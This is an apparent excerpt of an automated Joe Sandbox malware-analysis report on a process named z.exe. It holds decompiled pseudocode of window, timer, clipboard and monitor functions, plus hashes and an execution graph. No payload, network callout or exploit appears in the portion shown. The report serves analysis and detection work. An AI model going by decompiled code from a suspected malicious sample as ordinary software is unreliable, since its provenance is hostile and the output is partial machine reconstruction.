				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00413580( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00413524(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0042B890(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                  0x0042c279
                                  0x0042c286
                                  0x0042c299
                                  0x0042c29d
                                  0x0042c2ed
                                  0x0042c2ed
                                  0x0042c29f
                                  0x0042c29f
                                  0x0042c29f
                                  0x0042c2a9
                                  0x0042c2af
                                  0x00000000
                                  0x0042c2b7
                                  0x0042c2bc
                                  0x0042c2d0
                                  0x0042c2e7
                                  0x00000000
                                  0x00000000
                                  0x0042c2e7
                                  0x00000000
                                  0x0042c2e9
                                  0x0042c2e9
                                  0x00000000
                                  0x0042c29f
                                  0x0042c2f1
                                  0x0042c2fa

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  • Opcode ID: f3d2bcba678d793751b5d497cced17de83e92f3d07b1dde45eb5e8d406fc954f
                                  • Instruction ID: 8b597ec3d75e9df79f289e96feeeaa2bddebb3b7a55d53fe8eb65cff51145dd2
                                  • Opcode Fuzzy Hash: f3d2bcba678d793751b5d497cced17de83e92f3d07b1dde45eb5e8d406fc954f
                                  • Instruction Fuzzy Hash: 7D118231A042589BC711EAADD884BDF7BE89F49314F440196FC04F7342D779DD0587A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442180, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E00442180(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t23;
				char _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v8 = 0;
				_t23 =  *0x44dc28; // 0x0
				_v12 = _t23;
				_t24 =  *0x44dc34; // 0x0
				_v16 = _t24;
				 *0x44dc28 = __eax;
				 *0x44dc34 = 0;
				_push(_t30);
				_push(0x442223);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(_t30);
				_push(0x4421ec);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(0);
				_push(E00442130);
				_push(GetCurrentThreadId());
				L00406258();
				_t12 =  *0x44dc34; // 0x0
				_v8 = _t12;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x44222a);
				_t5 =  &_v16; // 0x4246e2
				 *0x44dc34 =  *_t5;
				_t16 = _v12;
				 *0x44dc28 = _t16;
				return _t16;
			}















                                  0x00442181
                                  0x00442183
                                  0x0044218b
                                  0x0044218e
                                  0x00442194
                                  0x00442197
                                  0x0044219d
                                  0x004421a0
                                  0x004421a7
                                  0x004421ae
                                  0x004421af
                                  0x004421b4
                                  0x004421b7
                                  0x004421bc
                                  0x004421bd
                                  0x004421c2
                                  0x004421c5
                                  0x004421c8
                                  0x004421ca
                                  0x004421d4
                                  0x004421d5
                                  0x004421da
                                  0x004421df
                                  0x004421e4
                                  0x004421e7
                                  0x00442207
                                  0x0044220a
                                  0x0044220d
                                  0x00442212
                                  0x00442215
                                  0x0044221a
                                  0x0044221d
                                  0x00442222

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 004421CF
                                  • 72E7AC10.USER32(00000000,00442130,00000000,00000000,004421EC,?,00000000,00442223), ref: 004421D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID: FB
                                  • API String ID: 2882836952-3670039715
                                  • Opcode ID: 4a59a1d64780181187bb131d7dcadb3780944814a00689025a252e310b40bdd9
                                  • Instruction ID: 7b415869748b168d5e1ebce3305042971c155c3e1f7520a5458ac82b162e55ca
                                  • Opcode Fuzzy Hash: 4a59a1d64780181187bb131d7dcadb3780944814a00689025a252e310b40bdd9
                                  • Instruction Fuzzy Hash: E4019675E09704AFE311CFA5ED9190ABBF9F74E720B618476F404D3750EAB45510CA1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00421DD0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x44f923 != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x44f904; // 0x421dd0
					 *0x44f904 = E00421B38(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x44f904(_a4, _a8, _t19);
				}
				return _t16;
			}













                                  0x00421dd6
                                  0x00421de0
                                  0x00421e0a
                                  0x00421e13
                                  0x00421e3b
                                  0x00421e3b
                                  0x00421e15
                                  0x00421e15
                                  0x00421e1a
                                  0x00000000
                                  0x00000000
                                  0x00421e1a
                                  0x00421de2
                                  0x00421de7
                                  0x00421df4
                                  0x00421e06
                                  0x00421e06
                                  0x00421e46

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00421E1E
                                  • GetSystemMetrics.USER32 ref: 00421E30
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  • Opcode ID: 9d614789823488b2eca96f45fa1d93b85254b0525a0d9d49b36da00db30eeb90
                                  • Instruction ID: 5987f07c728842c166cb19a2da79ffc1c9c3cf802d369183a20eeec826430bf5
                                  • Opcode Fuzzy Hash: 9d614789823488b2eca96f45fa1d93b85254b0525a0d9d49b36da00db30eeb90
                                  • Instruction Fuzzy Hash: 2601A235301228AFDB105F55EC44B9BBBA6EB61394F824036FD159B221C374AC4587A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421CA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00421CA8(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x44f922 != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x44f900; // 0x421ca8
					 *0x44f900 = E00421B38(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x44f900(_t14, _t17);
				}
				return _t19;
			}












                                  0x00421cae
                                  0x00421cb1
                                  0x00421cbb
                                  0x00421ce0
                                  0x00421ce9
                                  0x00421d10
                                  0x00421d10
                                  0x00421cbd
                                  0x00421cc2
                                  0x00421ccf
                                  0x00421cdc
                                  0x00421cdc
                                  0x00421d1b

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00421CF9
                                  • GetSystemMetrics.USER32 ref: 00421D05
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect
                                  • API String ID: 1792783759-4033241945
                                  • Opcode ID: a85dedd3e8941d8be2955b3a7ce186d5f3c83006fb37a35aa4054ddce9411918
                                  • Instruction ID: 437691efd68d69f09259f170b25e717ba68ea7445576b7cb15c50e2da24a8300
                                  • Opcode Fuzzy Hash: a85dedd3e8941d8be2955b3a7ce186d5f3c83006fb37a35aa4054ddce9411918
                                  • Instruction Fuzzy Hash: 1601A235300228EFD7109B54F885B16B764E762355FA44072E804DB226C378EC44CBB8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: z.exe PID: 6544 Parent PID: 6616 z.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1283
                                  Total number of Limit Nodes:35

                                  Graph

                                  execution_graph 76916 41ae71 76917 41ae84 76916->76917 76929 41aea4 76917->76929 76931 44e80b 10 API calls 76917->76931 76918 41af01 76921 41af4b 76918->76921 76925 41af22 SetTimer 76918->76925 76919 41af3f 76919->76921 76932 416000 KillTimer 76919->76932 76924 41af58 76921->76924 76933 401f02 49 API calls 76921->76933 76930 41af7e 76924->76930 76934 40137d 37 API calls 76924->76934 76925->76921 76926 41af8c GetTickCount 76928 41aebd 76926->76928 76929->76918 76929->76919 76929->76928 76930->76926 76930->76928 76931->76929 76932->76921 76933->76924 76934->76930 76935 404512 76936 40451d 76935->76936 76969 43aa38 76936->76969 76938 402d18 GetTickCount 76940 402d34 PeekMessageA 76938->76940 76951 402cf9 76938->76951 76941 402d56 GetTickCount 76940->76941 76942 402d4b 76940->76942 76941->76951 76942->76941 76943 402e16 GetTickCount 76943->76951 76953 402e47 76943->76953 76944 4029b5 169 API calls 76944->76951 76945 40903d 86 API calls 76945->76951 76946 41a263 50 API calls 76946->76951 76947 425baf 137 API calls 76947->76951 76950 442502 49 API calls 76950->76951 76951->76938 76951->76943 76951->76944 76951->76945 76951->76946 76951->76947 76951->76950 76952 416d44 37 API calls 76951->76952 76951->76953 76956 40184e 47 API calls 76951->76956 76958 43eb88 41 API calls 76951->76958 76962 409f1b 137 API calls 76951->76962 76994 44374a GlobalUnlock CloseClipboard 76951->76994 76995 401fbc 49 API calls 76951->76995 76996 4016b8 169 API calls 76951->76996 76997 40a134 137 API calls 5 library calls 76951->76997 76998 419c22 38 API calls 2 library calls 76951->76998 76999 43ea10 26 API calls ___initmbctable 76951->76999 77002 4013a5 176 API calls 76951->77002 77003 401d5e 47 API calls 76951->77003 77004 443c79 84 API calls 76951->77004 77005 401abf 92 API calls 76951->77005 77006 417d99 137 API calls 76951->77006 77007 44c1bc 137 API calls 2 library calls 76951->77007 76952->76951 76953->76951 76965 40332f RegCloseKey 76953->76965 77000 419eef 38 API calls 76953->77000 77001 40a357 39 API calls 3 library calls 76953->77001 76956->76951 76958->76951 76962->76951 76965->76951 76970 43b175 74 API calls 76969->76970 76971 43aa4f 76970->76971 76972 43ab41 76971->76972 76973 43aa5a GetWindowRect 76971->76973 76972->76951 76973->76972 76974 43aa6d 76973->76974 76975 43aa90 76974->76975 76976 442502 49 API calls 76974->76976 76978 442502 49 API calls 76975->76978 76986 43aab7 76975->76986 76977 43aa84 76976->76977 76977->76975 77008 40137d 37 API calls 76977->77008 76981 43aaab 76978->76981 76980 442502 49 API calls 76983 43aad1 76980->76983 76981->76986 77009 40137d 37 API calls 76981->77009 76985 43aadd 76983->76985 77010 40137d 37 API calls 76983->77010 76984 43ab01 MoveWindow 76984->76972 76989 43ab2a 76984->76989 76985->76984 76988 442502 49 API calls 76985->76988 76986->76980 76986->76985 76991 43aaf5 76988->76991 76989->76972 76993 43ab38 Sleep 76989->76993 76991->76984 77011 40137d 37 API calls 76991->77011 76993->76972 76994->76938 76995->76951 76996->76951 76997->76951 76998->76951 76999->76951 77000->76953 77001->76953 77002->76951 77003->76951 77004->76951 77005->76951 77006->76951 77007->76951 77008->76975 77009->76986 77010->76985 77011->76984 75495 426406 75496 426415 RegisterWindowMessageA 75495->75496 75497 42642c 75495->75497 75496->75497 75498 42649c 75497->75498 75499 42694d 75497->75499 75547 42646f 75497->75547 75501 4265b1 75498->75501 75506 426545 75498->75506 75534 4264ab 75498->75534 75500 42695a 75499->75500 75513 426b0d 75499->75513 75504 426a90 75500->75504 75505 426960 75500->75505 75503 426b54 DefWindowProcA 75501->75503 75501->75547 75502 426bb0 GetCurrentProcessId 75502->75547 75503->75547 75508 426ac4 75504->75508 75514 426aa3 75504->75514 75515 426ace 75504->75515 75509 426a49 75505->75509 75536 42696d 75505->75536 75506->75501 75511 42655b 75506->75511 75512 426909 75506->75512 75507 426b9a 75507->75502 75508->75503 75508->75515 75516 426a52 PostMessageA 75509->75516 75517 426a1a 75509->75517 75510 4265c0 75521 4265d1 75510->75521 75548 4265fb 75510->75548 75511->75501 75511->75510 75518 4268d9 75511->75518 75538 42656e 75511->75538 75595 4258ab 215 API calls 75512->75595 75513->75502 75513->75507 75519 426b29 75513->75519 75520 426b7f PostMessageA 75513->75520 75514->75503 75524 426aab 75514->75524 75525 426ad5 PostMessageA 75515->75525 75526 426aed 75515->75526 75516->75517 75533 426a84 SendMessageTimeoutA 75517->75533 75517->75547 75518->75503 75530 4268fb ShowWindow 75518->75530 75527 426b66 IsWindow 75519->75527 75528 426b2e 75519->75528 75603 40de0c GetTickCount 75520->75603 75529 4265da MoveWindow 75521->75529 75521->75530 75523 4264da 75523->75503 75537 4264e9 75523->75537 75599 43746b 82 API calls 75524->75599 75525->75547 75545 426b00 75526->75545 75526->75547 75539 426b71 GetWindowTextA 75527->75539 75527->75547 75528->75503 75601 417c4c LoadImageA Shell_NotifyIconA ___initmbctable 75528->75601 75529->75547 75530->75547 75531 426914 75531->75503 75540 42691f 75531->75540 75533->75547 75534->75510 75534->75523 75542 4264ca 75534->75542 75543 4264fe 75534->75543 75534->75547 75536->75517 75536->75520 75536->75528 75544 42699e 75536->75544 75537->75547 75594 417d99 137 API calls 75537->75594 75538->75528 75546 426579 GetMenu CheckMenuItem 75538->75546 75539->75547 75540->75547 75541 426b91 75541->75507 75541->75547 75542->75510 75549 4264d3 75542->75549 75543->75503 75550 42650d SetFocus 75543->75550 75551 426a07 PostMessageA 75544->75551 75552 4269a5 75544->75552 75600 44c66d 137 API calls ___initmbctable 75545->75600 75546->75501 75546->75503 75548->75501 75548->75503 75561 42667d 75548->75561 75565 4267e7 75548->75565 75549->75523 75549->75528 75550->75547 75551->75517 75552->75528 75556 4269b1 75552->75556 75558 4269c6 75556->75558 75596 44374a GlobalUnlock CloseClipboard 75556->75596 75557 426b4b 75602 40d84f LoadImageA Shell_NotifyIconA 75557->75602 75597 43b959 GetCurrentProcessId EnumWindows 75558->75597 75566 426682 75561->75566 75567 4266f6 75561->75567 75563 4269cb 75563->75547 75568 4269d5 75563->75568 75564 426802 GetClientRect 75571 426826 75564->75571 75565->75547 75565->75564 75566->75503 75574 4266a7 75566->75574 75577 4266a3 75566->75577 75569 426701 GetClientRect 75567->75569 75570 4267b8 75567->75570 75598 43c3f2 54 API calls 75568->75598 75589 42672c ExcludeClipRect CreateRectRgn GetClipRgn 75569->75589 75570->75503 75573 4267c2 GetClipBox FillRect 75570->75573 75576 426886 MoveWindow InvalidateRect 75571->75576 75582 42685a MoveWindow 75571->75582 75583 426869 75571->75583 75573->75547 75578 4266c0 SetBkColor 75574->75578 75575 4269e6 75575->75547 75581 4269ef SetTimer 75575->75581 75576->75547 75577->75574 75584 4266b8 GetSysColor 75577->75584 75579 4266d1 SetTextColor 75578->75579 75580 4266db 75578->75580 75579->75580 75580->75547 75587 4266e9 GetSysColorBrush 75580->75587 75581->75547 75582->75583 75585 426870 MoveWindow 75583->75585 75586 426881 75583->75586 75584->75578 75585->75586 75586->75576 75587->75547 75591 42679a 75589->75591 75592 42679e GetSysColorBrush 75589->75592 75593 4267a6 FillRgn DeleteObject 75591->75593 75592->75593 75593->75547 75594->75547 75595->75531 75596->75558 75597->75563 75604 43b883 GetWindowThreadProcessId GetClassNameA 75597->75604 75598->75575 75599->75540 75600->75547 75601->75557 75602->75503 75603->75541 75605 447741 75615 44774e 75605->75615 75607 447ac4 75608 44783e 75608->75607 75649 401c1f 75608->75649 75610 442502 49 API calls 75610->75615 75611 447869 75656 447d15 GetModuleFileNameA 75611->75656 75614 44788a 75614->75607 75666 450782 75614->75666 75615->75607 75615->75608 75615->75610 75728 40a7af 32 API calls _write_multi_char 75615->75728 75729 40184e 75615->75729 75617 4478b4 75617->75607 75618 447973 75617->75618 75619 44797c FindWindowA 75617->75619 75620 44790b 75617->75620 75618->75619 75621 4479fe 75618->75621 75619->75621 75630 44796c PostMessageA Sleep 75619->75630 75620->75621 75622 447917 FindWindowA 75620->75622 75686 43c3b0 75621->75686 75622->75621 75626 447933 75622->75626 75626->75607 75626->75630 75628 4479ec IsWindow 75629 4479f5 Sleep 75628->75629 75634 4479bb 75628->75634 75629->75621 75630->75628 75631 447a0a 75631->75607 75713 441f68 29 API calls __getbuf 75631->75713 75632 4479e5 Sleep 75632->75628 75634->75607 75634->75632 75635 447a21 75636 447a36 ___initmbctable 75635->75636 75750 43f68a 75635->75750 75637 447a93 75636->75637 75638 447a5c GetModuleHandleA GetProcAddress 75636->75638 75753 4114b4 92 API calls 75637->75753 75640 447a77 75638->75640 75641 447a8d #17 75638->75641 75640->75637 75641->75637 75643 447a98 75644 447ab2 75643->75644 75645 447ab9 75643->75645 75754 409ef4 47 API calls 75644->75754 75714 447561 75645->75714 75648 447ac0 75648->75607 75650 401c27 75649->75650 75651 401c4b 75650->75651 75654 401c58 75650->75654 75755 401dcc 47 API calls 75651->75755 75653 401c52 75653->75611 75654->75653 75756 401dcc 47 API calls 75654->75756 75757 43892a 75656->75757 75658 447efe 75658->75614 75659 447d4d _strlen _strrchr 75659->75658 75661 447da9 75659->75661 75768 442502 75659->75768 75661->75658 75773 40a6d3 32 API calls 75661->75773 75663 447e50 75663->75658 75664 447e6f GetModuleFileNameA 75663->75664 75665 447e8d _strlen _strrchr 75664->75665 75665->75658 75667 4507ab 75666->75667 75668 4508a7 75666->75668 75667->75668 75780 44e80b 10 API calls 75667->75780 75668->75617 75670 4507ba 75670->75668 75781 4481e0 75670->75781 75672 4507ef 75672->75668 75833 44b395 59 API calls 2 library calls 75672->75833 75674 450804 75674->75668 75834 44deb1 148 API calls 75674->75834 75676 450817 75676->75668 75677 45081f SetCurrentDirectoryA 75676->75677 75835 44b395 59 API calls 2 library calls 75677->75835 75679 45083a 75679->75668 75836 44b395 59 API calls 2 library calls 75679->75836 75681 45084a 75681->75668 75837 44e24c 137 API calls 75681->75837 75683 450868 75683->75668 75684 40184e 47 API calls 75683->75684 75685 450895 GetSystemTimeAsFileTime 75684->75685 75685->75668 75687 43c3c3 KiUserCallbackDispatcher 75686->75687 75688 43c3bb 75686->75688 75689 43c3ef 75687->75689 75690 43c3dc 75687->75690 75688->75687 75688->75689 75692 447adc 75689->75692 75690->75689 75691 43c3e4 SystemParametersInfoA 75690->75691 75691->75689 75693 447af7 75692->75693 75699 447b6e 75692->75699 75694 447aff LoadImageA LoadCursorA RegisterClassExA 75693->75694 75693->75699 75695 447b86 RegisterClassExA 75694->75695 75694->75699 75696 447b9f GetForegroundWindow 75695->75696 75695->75699 75697 447ba9 GetClassNameA 75696->75697 75703 447bc8 CreateWindowExA 75696->75703 75700 447bba 75697->75700 75697->75703 75699->75631 75701 442502 49 API calls 75700->75701 75701->75703 75702 447c16 GetMenu EnableMenuItem 76028 417cff EnableMenuItem EnableMenuItem EnableMenuItem EnableMenuItem 75702->76028 75703->75699 75703->75702 75705 447c3a CreateWindowExA 75705->75699 75706 447c86 SendMessageA ShowWindow ShowWindow 75705->75706 75707 447cb0 ShowWindow SetWindowLongA 75706->75707 75708 447cc9 LoadAcceleratorsA 75706->75708 75707->75708 75709 447ce7 75708->75709 75710 447cec 75708->75710 75709->75699 75712 447cfb SetClipboardViewer 75709->75712 76029 417c4c LoadImageA Shell_NotifyIconA ___initmbctable 75710->76029 75712->75699 75713->75635 75715 43f68a __getbuf 6 API calls 75714->75715 75716 447579 75715->75716 75717 447585 75716->75717 75718 44759f SetTimer 75716->75718 75717->75648 75719 4475d2 GetTickCount 75718->75719 75724 4475ca 75718->75724 75720 447622 GetTickCount 75719->75720 75721 447608 SetTimer 75719->75721 75722 447648 75720->75722 75721->75720 75723 447658 KillTimer 75722->75723 75722->75724 75723->75724 75725 40184e 47 API calls 75724->75725 75726 4476c5 75725->75726 75726->75717 76030 417d99 137 API calls 75726->76030 75728->75615 75731 40185d 75729->75731 75730 401877 _strlen 75732 401896 75730->75732 75733 4018ed 75730->75733 75731->75730 76032 401d9f 75731->76032 75735 4018d7 75732->75735 75736 40189c 75732->75736 75737 401935 75733->75737 75738 401919 75733->75738 75749 4018aa __shift 75733->75749 76036 443b6b GlobalAlloc GlobalLock GlobalFree 75735->76036 76031 443bda 15 API calls _strlen 75736->76031 75743 401996 75737->75743 75748 40194c 75737->75748 75737->75749 76037 4017d8 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75738->76037 75742 4018e2 75742->75749 76038 44e80b 10 API calls 75743->76038 75744 401a62 75747 43f68a __getbuf 6 API calls 75744->75747 75744->75749 75747->75744 75748->75744 75748->75749 76039 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75748->76039 75749->75615 76041 43f65e 75750->76041 75753->75643 75754->75645 75755->75653 75756->75653 75758 438a64 _strcat 75757->75758 75759 438941 _strlen 75757->75759 75758->75659 75759->75758 75761 438974 75759->75761 75778 442990 49 API calls ___initmbctable 75759->75778 75761->75758 75762 438a39 FindFirstFileA 75761->75762 75763 4389ee FindFirstFileA 75761->75763 75762->75758 75764 438a40 FindClose 75762->75764 75763->75758 75765 4389fb FindClose 75763->75765 75766 40a76e 32 API calls 75764->75766 75774 40a76e 75765->75774 75766->75758 75769 442510 75768->75769 75771 44250b 75768->75771 75770 4428bb 49 API calls 75769->75770 75772 44253d 75769->75772 75770->75769 75771->75661 75772->75661 75773->75663 75775 40a77a _strlen 75774->75775 75776 40a786 75775->75776 75779 40a718 32 API calls _write_multi_char 75775->75779 75776->75761 75778->75761 75779->75776 75780->75670 75782 4481ef ___initmbctable 75781->75782 75785 448267 75782->75785 75838 4508c7 75782->75838 75785->75672 75788 450c9f 46 API calls 75789 4482bf 75788->75789 75790 450c9f 46 API calls 75789->75790 75811 44829c _strcat __shift _strlen 75789->75811 75791 4482eb 75790->75791 75792 450c9f 46 API calls 75791->75792 75791->75811 75794 44830f 75792->75794 75793 44933b 75795 449378 ___initmbctable 75793->75795 75914 449d8e 85 API calls 4 library calls 75793->75914 75796 4493a8 75794->75796 75794->75811 75916 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75795->75916 75918 450aac 26 API calls 75796->75918 75800 449361 75800->75795 75802 448ee2 75800->75802 75801 449397 75917 450aac 26 API calls 75801->75917 75915 4505f8 26 API calls ___initmbctable 75802->75915 75805 40a7af 32 API calls 75805->75811 75806 449d8e 85 API calls 75806->75811 75807 442990 49 API calls 75807->75811 75809 41d1a8 60 API calls 75809->75811 75810 44947c 49 API calls 75810->75811 75811->75793 75811->75802 75811->75805 75811->75806 75811->75807 75811->75809 75811->75810 75812 442545 49 API calls 75811->75812 75815 40a6d3 32 API calls 75811->75815 75816 44b395 59 API calls 75811->75816 75817 44fadc 49 API calls 75811->75817 75826 4493d8 49 API calls 75811->75826 75831 448d22 IsCharUpperA 75811->75831 75832 442502 49 API calls 75811->75832 75901 43cc34 37 API calls ___initmbctable 75811->75901 75902 44f2cb 58 API calls ___initmbctable 75811->75902 75903 410c74 76 API calls 75811->75903 75904 410faf 49 API calls ___initmbctable 75811->75904 75906 410faf 49 API calls ___initmbctable 75811->75906 75908 410401 49 API calls 75811->75908 75909 40f8c1 52 API calls 2 library calls 75811->75909 75910 410b93 49 API calls 75811->75910 75911 4119b4 10 API calls ___initmbctable 75811->75911 75912 410376 78 API calls 75811->75912 75913 439871 49 API calls _strlen 75811->75913 75812->75811 75815->75811 75816->75811 75817->75811 75821 448c89 GetKeyboardLayout 75905 415b93 51 API calls _strlen 75821->75905 75826->75811 75828 448cc3 GetKeyboardLayout 75907 415b93 51 API calls _strlen 75828->75907 75831->75811 75832->75811 75833->75674 75834->75676 75835->75679 75836->75681 75837->75683 75919 450f56 75838->75919 75842 450905 _strlen 75842->75842 75859 448263 75842->75859 75924 458d16 75842->75924 75849 458c2d 12 API calls 75850 45098d 75849->75850 75851 458d16 21 API calls 75850->75851 75856 450998 75851->75856 75852 4509d8 75853 450a19 75852->75853 75855 458d16 21 API calls 75852->75855 75949 43ea10 26 API calls ___initmbctable 75853->75949 75854 458c2d 12 API calls 75854->75856 75858 4509ed 75855->75858 75856->75852 75856->75854 75860 458c2d 12 API calls 75858->75860 75859->75785 75872 450c9f 75859->75872 75861 4509fb 75860->75861 75861->75853 75862 458c2d 12 API calls 75861->75862 75863 450a2a 75862->75863 75863->75853 75864 450a42 75863->75864 75865 458c2d 12 API calls 75864->75865 75866 450a50 75865->75866 75867 458c2d 12 API calls 75866->75867 75868 450a67 75867->75868 75945 450aba 75868->75945 75871 458ad4 2 API calls 75871->75859 75873 450cb6 75872->75873 75874 458d16 21 API calls 75873->75874 75875 450cc2 75874->75875 76024 450dca 32 API calls 75875->76024 75877 450cd6 75878 448298 75877->75878 75879 458c2d 12 API calls 75877->75879 75878->75788 75878->75811 75880 450cf4 75879->75880 75881 458c2d 12 API calls 75880->75881 75882 450d02 75881->75882 75883 458c2d 12 API calls 75882->75883 75884 450d19 75883->75884 75885 458d16 21 API calls 75884->75885 75886 450d30 75885->75886 75887 43f68a __getbuf 6 API calls 75886->75887 75888 450d3a 75887->75888 75889 43f68a __getbuf 6 API calls 75888->75889 75890 450d46 75889->75890 75891 458c2d 12 API calls 75890->75891 75892 450d53 75891->75892 75893 450aba GetTickCount 75892->75893 75894 450d6e 75893->75894 75895 450dad 75894->75895 75897 450d73 75894->75897 76027 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75895->76027 76025 450fea 45 API calls 75897->76025 75899 450da4 76026 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75899->76026 75901->75811 75902->75811 